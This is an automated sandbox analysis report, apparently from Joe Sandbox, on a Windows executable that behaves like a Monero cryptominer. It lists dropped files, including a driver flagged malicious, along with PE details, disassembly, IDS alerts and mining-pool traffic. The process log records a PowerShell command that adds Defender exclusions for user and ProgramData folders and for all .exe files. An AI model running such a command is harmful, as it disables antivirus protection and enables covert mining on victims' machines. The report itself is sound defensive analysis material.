                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jrepo3wb.v1p.psm1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tzt5kz4g.cir.ps1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wiecjbmf.q0f.psm1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):64
                                                      Entropy (8bit):0.34726597513537405
                                                      Encrypted:false
                                                      SSDEEP:3:Nlll:Nll
                                                      MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                      SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                      SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                      SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                      Malicious:false
                                                      Preview:@...e...........................................................

                                                      C:\Windows\Temp\__PSScriptPolicyTest_0htk1wp1.uea.ps1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Windows\Temp\__PSScriptPolicyTest_0xe1xeou.vfv.ps1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Windows\Temp\__PSScriptPolicyTest_2a3dexgp.bsj.psm1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Windows\Temp\__PSScriptPolicyTest_ixvurond.xkj.psm1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Windows\Temp\ovabrjmyzhdo.sys

                                                      Download File
                                                      Process:C:\ProgramData\obuuzbczoxdo\jjlazghkkuth.exe
                                                      File Type:PE32+ executable (native) x86-64, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):14544
                                                      Entropy (8bit):6.2660301556221185
                                                      Encrypted:false
                                                      SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                      MD5:0C0195C48B6B8582FA6F6373032118DA
                                                      SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                      SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                      SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 5%
                                                      Joe Sandbox View:
                                                      • Filename: Ky4J8k89A7.exe, Detection: malicious, Browse
                                                      • Filename: file.exe, Detection: malicious, Browse
                                                      • Filename: boooba.exe, Detection: malicious, Browse
                                                      • Filename: SecuriteInfo.com.Trojan.Siggen29.1091.20762.15518.exe, Detection: malicious, Browse
                                                      • Filename: 2HUgVjrn3O.exe, Detection: malicious, Browse
                                                      • Filename: SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe, Detection: malicious, Browse
                                                      • Filename: Yf4yviDxwF.exe, Detection: malicious, Browse
                                                      • Filename: file.exe, Detection: malicious, Browse
                                                      • Filename: SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exe, Detection: malicious, Browse
                                                      • Filename: prog.exe, Detection: malicious, Browse
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

                                                      Static File Info

                                                      General

                                                      File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                      Entropy (8bit):6.547140340840566
                                                      TrID:
                                                      • Win64 Executable GUI (202006/5) 92.65%
                                                      • Win64 Executable (generic) (12005/4) 5.51%
                                                      • Generic Win/DOS Executable (2004/3) 0.92%
                                                      • DOS Executable Generic (2002/1) 0.92%
                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                      File name:12Jh49DCAj.exe
                                                      File size:2'630'144 bytes
                                                      MD5:a44c57ded5f0e75dd398f8bde8c83219
                                                      SHA1:b46a7f6d001c9e06b7dcc39a926130fb791f4663
                                                      SHA256:003342f9137c04ac86b94e7798a9b0ebe7cff13524bb191f7ac2472a059b442d
                                                      SHA512:244d584d9ad19123c5d251b1347449460fc3c47b61de7a9880af87ffadabdbe0270cb75b972907bf534f50aebe341d7ec77cb586f51c6bb02a3524197f39e031
                                                      SSDEEP:49152:KMv8tD+YOamKt4XZo5SUUxf8FnXVj7mJ5Ls6il6Sqd:/v8t+YJqUU2hXAJ5Lg6Sqd
                                                      TLSH:B3C533C9262D54B9DBCF8038C6C56F37B69D3875671209CE8EE050311BF4ADCA8789E9
                                                      File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...-( g.........."......|....'.....@..........@..............................(.......(...`........................................

                                                      File Icon

                                                      Icon Hash:00928e8e8686b000

                                                      Static PE Info

                                                      General

                                                      Entrypoint:0x140001140
                                                      Entrypoint Section:.text
                                                      Digitally signed:false
                                                      Imagebase:0x140000000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                      Time Stamp:0x6720282D [Tue Oct 29 00:11:25 2024 UTC]
                                                      TLS Callbacks:0x40001760, 0x1, 0x400017e0, 0x1
                                                      CLR (.Net) Version:
                                                      OS Version Major:6
                                                      OS Version Minor:0
                                                      File Version Major:6
                                                      File Version Minor:0
                                                      Subsystem Version Major:6
                                                      Subsystem Version Minor:0
                                                      Import Hash:de41d4e0545d977de6ca665131bb479a

                                                      Entrypoint Preview

                                                      Instruction
                                                      dec eax
                                                      sub esp, 28h
                                                      dec eax
                                                      mov eax, dword ptr [00007ED5h]
                                                      mov dword ptr [eax], 00000001h
                                                      call 00007F0F3CB879CFh
                                                      nop
                                                      nop
                                                      nop
                                                      dec eax
                                                      add esp, 28h
                                                      ret
                                                      nop
                                                      inc ecx
                                                      push edi
                                                      inc ecx
                                                      push esi
                                                      push esi
                                                      push edi
                                                      push ebx
                                                      dec eax
                                                      sub esp, 20h
                                                      dec eax
                                                      mov eax, dword ptr [00000030h]
                                                      dec eax
                                                      mov edi, dword ptr [eax+08h]
                                                      dec eax
                                                      mov esi, dword ptr [00007EC9h]
                                                      xor eax, eax
                                                      dec eax
                                                      cmpxchg dword ptr [esi], edi
                                                      sete bl
                                                      je 00007F0F3CB879F0h
                                                      dec eax
                                                      cmp edi, eax
                                                      je 00007F0F3CB879EBh
                                                      dec esp
                                                      mov esi, dword ptr [00009669h]
                                                      nop word ptr [eax+eax+00000000h]
                                                      mov ecx, 000003E8h
                                                      inc ecx
                                                      call esi
                                                      xor eax, eax
                                                      dec eax
                                                      cmpxchg dword ptr [esi], edi
                                                      sete bl
                                                      je 00007F0F3CB879C7h
                                                      dec eax
                                                      cmp edi, eax
                                                      jne 00007F0F3CB879A9h
                                                      dec eax
                                                      mov edi, dword ptr [00007E90h]
                                                      mov eax, dword ptr [edi]
                                                      cmp eax, 01h
                                                      jne 00007F0F3CB879CEh
                                                      mov ecx, 0000001Fh
                                                      call 00007F0F3CB8F074h
                                                      jmp 00007F0F3CB879E9h
                                                      cmp dword ptr [edi], 00000000h
                                                      je 00007F0F3CB879CBh
                                                      mov byte ptr [002817C9h], 00000001h
                                                      jmp 00007F0F3CB879DBh
                                                      mov dword ptr [edi], 00000001h
                                                      dec eax
                                                      mov ecx, dword ptr [00007E7Ah]
                                                      dec eax
                                                      mov edx, dword ptr [00007E7Bh]
                                                      call 00007F0F3CB8F06Bh
                                                      mov eax, dword ptr [edi]
                                                      cmp eax, 01h
                                                      jne 00007F0F3CB879DBh
                                                      dec eax
                                                      mov ecx, dword ptr [00007E50h]

                                                      Data Directories

                                                      NameVirtual AddressVirtual Size Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xa5380x3c.rdata
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x2870000x10.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x2840000x180.pdata
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x2880000x78.reloc
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_TLS0x90a00x28.rdata
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x94100x138.rdata
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IAT0xa6d00x158.rdata
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                      Sections

                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                      .text0x10000x7a060x7c00538cbceef9250d3a85472682959dfbffFalse0.5035912298387096data6.171302852555024IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                      .rdata0x90000x1c800x1e00fcf3a89560e8c1b62b73b6fe1827ecafFalse0.4412760416666667zlib compressed data4.602205049073675IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .data0xb0000x2788600x277a00329bf0a445fe3e6112c486e30f1502ceunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      .pdata0x2840000x1800x20085b24f652d2029208ae18728cbfe42feFalse0.50390625data3.137358409693989IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .00cfg0x2850000x100x200b18c7380298e104adf73576fa46bccc1False0.04296875data0.15127132530476972IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .tls0x2860000x100x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      .rsrc0x2870000x100x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .reloc0x2880000x780x2006b0d02e3b9bf86dfff1065655fe64131False0.232421875data1.4178553129526903IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                      Imports

                                                      DLLImport
                                                      msvcrt.dll__C_specific_handler, __getmainargs, __initenv, __iob_func, __set_app_type, __setusermatherr, _amsg_exit, _cexit, _commode, _fmode, _initterm, _onexit, _wcsicmp, _wcsnicmp, abort, calloc, exit, fprintf, free, fwrite, malloc, memcpy, memset, signal, strlen, strncmp, vfprintf, wcscat, wcscpy, wcslen, wcsncmp
                                                      KERNEL32.dllDeleteCriticalSection, EnterCriticalSection, GetLastError, InitializeCriticalSection, LeaveCriticalSection, SetUnhandledExceptionFilter, Sleep, TlsGetValue, VirtualProtect, VirtualQuery

                                                      Network Behavior

                                                      Suricata IDS Alerts

                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                      2024-10-31T20:11:20.574099+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow1172.202.163.200443192.168.2.649746TCP
                                                      2024-10-31T20:11:58.857779+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow1172.202.163.200443192.168.2.649952TCP

                                                      Network Port Distribution

                                                      TCP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Oct 31, 2024 20:11:09.683516979 CET4971010343192.168.2.654.37.232.103
                                                      Oct 31, 2024 20:11:09.688560009 CET103434971054.37.232.103192.168.2.6
                                                      Oct 31, 2024 20:11:09.688631058 CET4971010343192.168.2.654.37.232.103
                                                      Oct 31, 2024 20:11:09.688870907 CET4971010343192.168.2.654.37.232.103
                                                      Oct 31, 2024 20:11:09.694188118 CET103434971054.37.232.103192.168.2.6
                                                      Oct 31, 2024 20:11:10.573369026 CET103434971054.37.232.103192.168.2.6
                                                      Oct 31, 2024 20:11:10.573396921 CET103434971054.37.232.103192.168.2.6
                                                      Oct 31, 2024 20:11:10.573457003 CET4971010343192.168.2.654.37.232.103
                                                      Oct 31, 2024 20:11:10.574358940 CET4971010343192.168.2.654.37.232.103
                                                      Oct 31, 2024 20:11:10.579190969 CET103434971054.37.232.103192.168.2.6
                                                      Oct 31, 2024 20:11:10.833146095 CET103434971054.37.232.103192.168.2.6
                                                      Oct 31, 2024 20:11:10.874387980 CET4971010343192.168.2.654.37.232.103
                                                      Oct 31, 2024 20:11:10.887053013 CET103434971054.37.232.103192.168.2.6
                                                      Oct 31, 2024 20:11:10.936868906 CET4971010343192.168.2.654.37.232.103
                                                      Oct 31, 2024 20:11:20.306047916 CET103434971054.37.232.103192.168.2.6
                                                      Oct 31, 2024 20:11:20.358824015 CET4971010343192.168.2.654.37.232.103
                                                      Oct 31, 2024 20:11:30.163203955 CET103434971054.37.232.103192.168.2.6
                                                      Oct 31, 2024 20:11:30.311887980 CET4971010343192.168.2.654.37.232.103
                                                      Oct 31, 2024 20:11:40.189359903 CET103434971054.37.232.103192.168.2.6
                                                      Oct 31, 2024 20:11:40.296288967 CET4971010343192.168.2.654.37.232.103
                                                      Oct 31, 2024 20:11:40.507215977 CET103434971054.37.232.103192.168.2.6
                                                      Oct 31, 2024 20:11:40.507301092 CET4971010343192.168.2.654.37.232.103
                                                      Oct 31, 2024 20:11:46.114474058 CET103434971054.37.232.103192.168.2.6
                                                      Oct 31, 2024 20:11:46.155668974 CET4971010343192.168.2.654.37.232.103
                                                      Oct 31, 2024 20:11:56.246623039 CET103434971054.37.232.103192.168.2.6
                                                      Oct 31, 2024 20:11:56.296289921 CET4971010343192.168.2.654.37.232.103
                                                      Oct 31, 2024 20:12:06.559458017 CET103434971054.37.232.103192.168.2.6
                                                      Oct 31, 2024 20:12:06.559493065 CET103434971054.37.232.103192.168.2.6
                                                      Oct 31, 2024 20:12:06.559676886 CET4971010343192.168.2.654.37.232.103
                                                      Oct 31, 2024 20:12:17.081516981 CET103434971054.37.232.103192.168.2.6
                                                      Oct 31, 2024 20:12:17.082031965 CET103434971054.37.232.103192.168.2.6
                                                      Oct 31, 2024 20:12:17.082118034 CET4971010343192.168.2.654.37.232.103
                                                      Oct 31, 2024 20:12:17.082405090 CET103434971054.37.232.103192.168.2.6
                                                      Oct 31, 2024 20:12:17.082449913 CET4971010343192.168.2.654.37.232.103
                                                      Oct 31, 2024 20:12:26.225205898 CET103434971054.37.232.103192.168.2.6
                                                      Oct 31, 2024 20:12:26.280752897 CET4971010343192.168.2.654.37.232.103
                                                      Oct 31, 2024 20:12:36.390104055 CET103434971054.37.232.103192.168.2.6
                                                      Oct 31, 2024 20:12:36.436968088 CET4971010343192.168.2.654.37.232.103
                                                      Oct 31, 2024 20:12:46.387470007 CET103434971054.37.232.103192.168.2.6
                                                      Oct 31, 2024 20:12:46.437077999 CET4971010343192.168.2.654.37.232.103
                                                      Oct 31, 2024 20:12:56.307926893 CET103434971054.37.232.103192.168.2.6
                                                      Oct 31, 2024 20:12:56.358908892 CET4971010343192.168.2.654.37.232.103
                                                      Oct 31, 2024 20:13:06.254304886 CET103434971054.37.232.103192.168.2.6
                                                      Oct 31, 2024 20:13:06.312061071 CET4971010343192.168.2.654.37.232.103
                                                      Oct 31, 2024 20:13:16.377563000 CET103434971054.37.232.103192.168.2.6
                                                      Oct 31, 2024 20:13:16.421890974 CET4971010343192.168.2.654.37.232.103
                                                      Oct 31, 2024 20:13:26.278835058 CET103434971054.37.232.103192.168.2.6
                                                      Oct 31, 2024 20:13:26.327657938 CET4971010343192.168.2.654.37.232.103
                                                      Oct 31, 2024 20:13:36.351224899 CET103434971054.37.232.103192.168.2.6
                                                      Oct 31, 2024 20:13:36.405807972 CET4971010343192.168.2.654.37.232.103
                                                      Oct 31, 2024 20:13:46.550604105 CET103434971054.37.232.103192.168.2.6
                                                      Oct 31, 2024 20:13:46.671483040 CET4971010343192.168.2.654.37.232.103
                                                      Oct 31, 2024 20:13:56.312772989 CET103434971054.37.232.103192.168.2.6
                                                      Oct 31, 2024 20:13:56.374738932 CET4971010343192.168.2.654.37.232.103
                                                      Oct 31, 2024 20:14:04.140691042 CET103434971054.37.232.103192.168.2.6
                                                      Oct 31, 2024 20:14:04.381408930 CET4971010343192.168.2.654.37.232.103
                                                      Oct 31, 2024 20:14:04.488863945 CET103434971054.37.232.103192.168.2.6
                                                      Oct 31, 2024 20:14:04.488970995 CET4971010343192.168.2.654.37.232.103
                                                      Oct 31, 2024 20:14:14.189049959 CET103434971054.37.232.103192.168.2.6
                                                      Oct 31, 2024 20:14:14.374641895 CET4971010343192.168.2.654.37.232.103
                                                      Oct 31, 2024 20:14:24.169471025 CET103434971054.37.232.103192.168.2.6
                                                      Oct 31, 2024 20:14:24.374628067 CET4971010343192.168.2.654.37.232.103
                                                      Oct 31, 2024 20:14:34.151727915 CET103434971054.37.232.103192.168.2.6
                                                      Oct 31, 2024 20:14:34.374646902 CET4971010343192.168.2.654.37.232.103
                                                      Oct 31, 2024 20:14:44.193420887 CET103434971054.37.232.103192.168.2.6
                                                      Oct 31, 2024 20:14:44.374658108 CET4971010343192.168.2.654.37.232.103
                                                      Oct 31, 2024 20:14:54.233042955 CET103434971054.37.232.103192.168.2.6
                                                      Oct 31, 2024 20:14:54.280483961 CET4971010343192.168.2.654.37.232.103
                                                      Oct 31, 2024 20:15:04.244034052 CET103434971054.37.232.103192.168.2.6
                                                      Oct 31, 2024 20:15:04.376812935 CET4971010343192.168.2.654.37.232.103

                                                      UDP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Oct 31, 2024 20:11:09.671679020 CET5546953192.168.2.61.1.1.1
                                                      Oct 31, 2024 20:11:09.679805040 CET53554691.1.1.1192.168.2.6

                                                      DNS Queries

                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      Oct 31, 2024 20:11:09.671679020 CET192.168.2.61.1.1.10x9935Standard query (0)xmr-eu1.nanopool.orgA (IP address)IN (0x0001)false

                                                      DNS Answers

                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      Oct 31, 2024 20:11:09.679805040 CET1.1.1.1192.168.2.60x9935No error (0)xmr-eu1.nanopool.org51.15.65.182A (IP address)IN (0x0001)false
                                                      Oct 31, 2024 20:11:09.679805040 CET1.1.1.1192.168.2.60x9935No error (0)xmr-eu1.nanopool.org51.15.58.224A (IP address)IN (0x0001)false
                                                      Oct 31, 2024 20:11:09.679805040 CET1.1.1.1192.168.2.60x9935No error (0)xmr-eu1.nanopool.org146.59.154.106A (IP address)IN (0x0001)false
                                                      Oct 31, 2024 20:11:09.679805040 CET1.1.1.1192.168.2.60x9935No error (0)xmr-eu1.nanopool.org212.47.253.124A (IP address)IN (0x0001)false
                                                      Oct 31, 2024 20:11:09.679805040 CET1.1.1.1192.168.2.60x9935No error (0)xmr-eu1.nanopool.org54.37.137.114A (IP address)IN (0x0001)false
                                                      Oct 31, 2024 20:11:09.679805040 CET1.1.1.1192.168.2.60x9935No error (0)xmr-eu1.nanopool.org51.15.193.130A (IP address)IN (0x0001)false
                                                      Oct 31, 2024 20:11:09.679805040 CET1.1.1.1192.168.2.60x9935No error (0)xmr-eu1.nanopool.org54.37.232.103A (IP address)IN (0x0001)false
                                                      Oct 31, 2024 20:11:09.679805040 CET1.1.1.1192.168.2.60x9935No error (0)xmr-eu1.nanopool.org162.19.224.121A (IP address)IN (0x0001)false
                                                      Oct 31, 2024 20:11:09.679805040 CET1.1.1.1192.168.2.60x9935No error (0)xmr-eu1.nanopool.org163.172.154.142A (IP address)IN (0x0001)false
                                                      Oct 31, 2024 20:11:09.679805040 CET1.1.1.1192.168.2.60x9935No error (0)xmr-eu1.nanopool.org51.89.23.91A (IP address)IN (0x0001)false
                                                      Oct 31, 2024 20:11:09.679805040 CET1.1.1.1192.168.2.60x9935No error (0)xmr-eu1.nanopool.org141.94.23.83A (IP address)IN (0x0001)false

                                                      Statistics

                                                      CPU Usage

                                                      Click to jump to process

                                                      Memory Usage

                                                      Click to jump to process

                                                      High Level Behavior Distribution

                                                      Click to dive into process behavior distribution

                                                      Behavior

                                                      Click to jump to process

                                                      System Behavior

                                                      General

                                                      Target ID:0
                                                      Start time:15:11:02
                                                      Start date:31/10/2024
                                                      Path:C:\Users\user\Desktop\12Jh49DCAj.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Users\user\Desktop\12Jh49DCAj.exe"
                                                      Imagebase:0x7ff6c5320000
                                                      File size:2'630'144 bytes
                                                      MD5 hash:A44C57DED5F0E75DD398F8BDE8C83219
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low
                                                      Has exited:true

                                                      General

                                                      Target ID:1
                                                      Start time:15:11:02
                                                      Start date:31/10/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                      Imagebase:0x7ff6e3d50000
                                                      File size:452'608 bytes
                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:2
                                                      Start time:15:11:02
                                                      Start date:31/10/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
